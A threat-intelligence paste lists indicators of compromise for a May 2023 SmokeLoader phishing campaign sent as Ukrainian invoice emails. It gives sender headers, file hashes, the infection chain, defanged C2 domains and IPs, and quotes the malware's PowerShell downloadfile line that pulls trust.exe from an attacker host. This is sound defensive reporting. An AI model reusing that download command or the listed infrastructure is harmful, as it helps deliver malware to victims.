API tools faq
paste
Advertisement
VRad

#smokeloader_300523

VRad
May 30th, 2023 (edited)
353
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.04 KB | None | 0 0
raw download clone embed print report
  1. #IOC #OptiData #VR #smokeloader #ZIP #PSWEB #VBS
  2.  
  3. https://pastebin.com/DgFvarG0
  4.  
  5. previous_contact:
  6. https://pastebin.com/AayUSaXq
  7. https://pastebin.com/RDVXCe0J
  8. https://pastebin.com/QpG70u8T
  9. https://pastebin.com/BJzcXqkK
  10. https://pastebin.com/kBW7nkZ5
  11. https://pastebin.com/Z7zq0YkW
  12. https://pastebin.com/b8PkhMyN
  13. https://pastebin.com/hkskwKvc
  14. https://pastebin.com/JmthzrL4
  15. https://pastebin.com/1scwT0f8
  16. https://pastebin.com/MP3kCSSh
  17.  
  18. FAQ:
  19. https://radetskiy.wordpress.com/2018/10/19/ioc_smokeloader_111018/
  20. https://research.checkpoint.com/2019-resurgence-of-smokeloader/
  21.  
  22. attack_vector
  23. --------------
  24. email attach .zip? > .VBS > WSH > PowerShell > URL > get download string > %temp%\*.exe
  25.  
  26.  
  27. # # # # # # # #
  28. email_headers
  29. # # # # # # # #
  30. Return-Path: <operator.lv01@emm.ua>
  31. Received: from mail.emm.ua (mail.t-sna.com [193.19.240.25])
  32. Received: from internal.domain; Tue, 30 May 2023 08:39:18 +0300
  33. Reply-To: elrayvno@ukr.net
  34. Date: Tue, 30 May 2023 08:39:15 +0300
  35. Subject: Re: акт звірки та рахунки
  36. From: бух. відділ <operator.lv01@emm.ua>
  37. Message-ID: <01bae4p-12pzcf-21@emm.ua>
  38.  
  39.  
  40. # # # # # # # #
  41. other senders
  42. # # # # # # # #
  43. operator.lv01[@]emm[.]ua
  44. support[@]romb[.]ua
  45.  
  46.  
  47. # # # # # # # #
  48. files
  49. # # # # # # # #
  50. SHA-256 54874acabfbf873ce2c0f8daf7f65f4e545a8e1dc8bb99c312c22a16134a5088
  51. File name Рахунок (без ПДВ) № 28 від 28.05.2023.zip [ Zip archive data ]
  52. File size 65.67 KB (67242 bytes)
  53.  
  54. SHA-256 6a89bcfa9e6e5f8ab93be9031720f281b5e8923092622163a9d7b7192ad9c5d4
  55. File name Рахунок (без ПДВ) № 28 від 28.05.2023.pdf [ PDF document, version 1.4 ] ! - CLEAN
  56. File size 60.86 KB (62318 bytes)
  57.  
  58. SHA-256 375798f97452cb9143ffb08922bebb13eb6bb0c27a101ebc568a3e5295361936
  59. File name AKT_28_05_2023p._pax_28_05_2023p.vbs [ JavaScript ]
  60. File size 22.90 KB (23454 bytes)
  61.  
  62. SHA-256 9892c10b94bbb90688cdc3dd6d51f3343b9cc19069fa4c1fe3594600a3d03330
  63. File name trust.exe [ PE32 executable (GUI) ]
  64. File size 274.00 KB (280576 bytes)
  65.  
  66.  
  67. # # # # # # # #
  68. activity
  69. # # # # # # # #
  70.  
  71. PL_SCR americanocoffea{ .ru > $client.downloadfile('http://americanocoffea{ .ru/antirecord/trust.exe',$path) ! - may change URL and filename
  72. $client.downloadfile('http://jskgdhjkdfhjdkjhd844{ .ru/antirecord/trust.exe',$path)
  73.  
  74. C2
  75.  
  76. polinamailserverip{ .ru/
  77. lamazone{ .site/
  78. criticalosl{ .tech/
  79. maximprofile{ .net/
  80. zaliphone{ .com/
  81. humanitarydp{ .ug/
  82. zaikaopentra{ .com.ug/
  83. zaikaopentra-com-ug{ .online/
  84. infomalilopera{ .ru/
  85. jskgdhjkdfhjdkjhd844{ .ru/
  86. jkghdj2993jdjjdjd{ .ru/
  87. kjhgdj99fuller{ .ru/
  88. azartnyjboy{ .com/
  89. zalamafiapopcultur{ .eu/
  90. hopentools{ .site/
  91. kismamabeforyougo{ .com/
  92. kissmafiabeforyoudied{ .eu/
  93. gondurasonline{ .ug/
  94. nabufixservice{ .name/
  95. filterfullproperty{ .ru/
  96. alegoomaster{ .com/
  97. freesitucionap{ .com/
  98. droopily{ .eu/
  99. prostotaknet{ .net/
  100. zakolibal{ .online/
  101. verycheap{ .store/
  102.  
  103.  
  104. netwrk
  105. --------------
  106. 176.124.193.111 americanocoffea{ .ru 80 HTTP GET / HTTP/1.1
  107. 176.124.193.111 americanocoffea{ .ru 80 HTTP GET /antirecord/trust.exe HTTP/1.1
  108.  
  109. comp
  110. --------------
  111. 195.123.219.57 freesitucionap{ .com 80 HTTP POST / HTTP/1.1 (application/x-www-form-urlencoded) Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  112.  
  113. proc
  114. --------------
  115.  
  116.  
  117. persist
  118. --------------
  119. n/a
  120.  
  121.  
  122. drop
  123. --------------
  124. C:\Users\%username%\AppData\Local\Temp\%random%.exe
  125.  
  126.  
  127. # # # # # # # #
  128. additional info
  129. # # # # # # # #
  130. n/a
  131.  
  132.  
  133. # # # # # # # #
  134. VT & Intezer
  135. # # # # # # # #
  136. https://www.virustotal.com/gui/file/54874acabfbf873ce2c0f8daf7f65f4e545a8e1dc8bb99c312c22a16134a5088/details
  137. https://www.virustotal.com/gui/file/6a89bcfa9e6e5f8ab93be9031720f281b5e8923092622163a9d7b7192ad9c5d4/details
  138. https://www.virustotal.com/gui/file/375798f97452cb9143ffb08922bebb13eb6bb0c27a101ebc568a3e5295361936/details
  139. https://www.virustotal.com/gui/file/9892c10b94bbb90688cdc3dd6d51f3343b9cc19069fa4c1fe3594600a3d03330/details
  140. https://analyze.intezer.com/analyses/f6d5cfe5-181c-490f-8551-ae9bc12b64c3
  141.  
  142. VR
  143.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!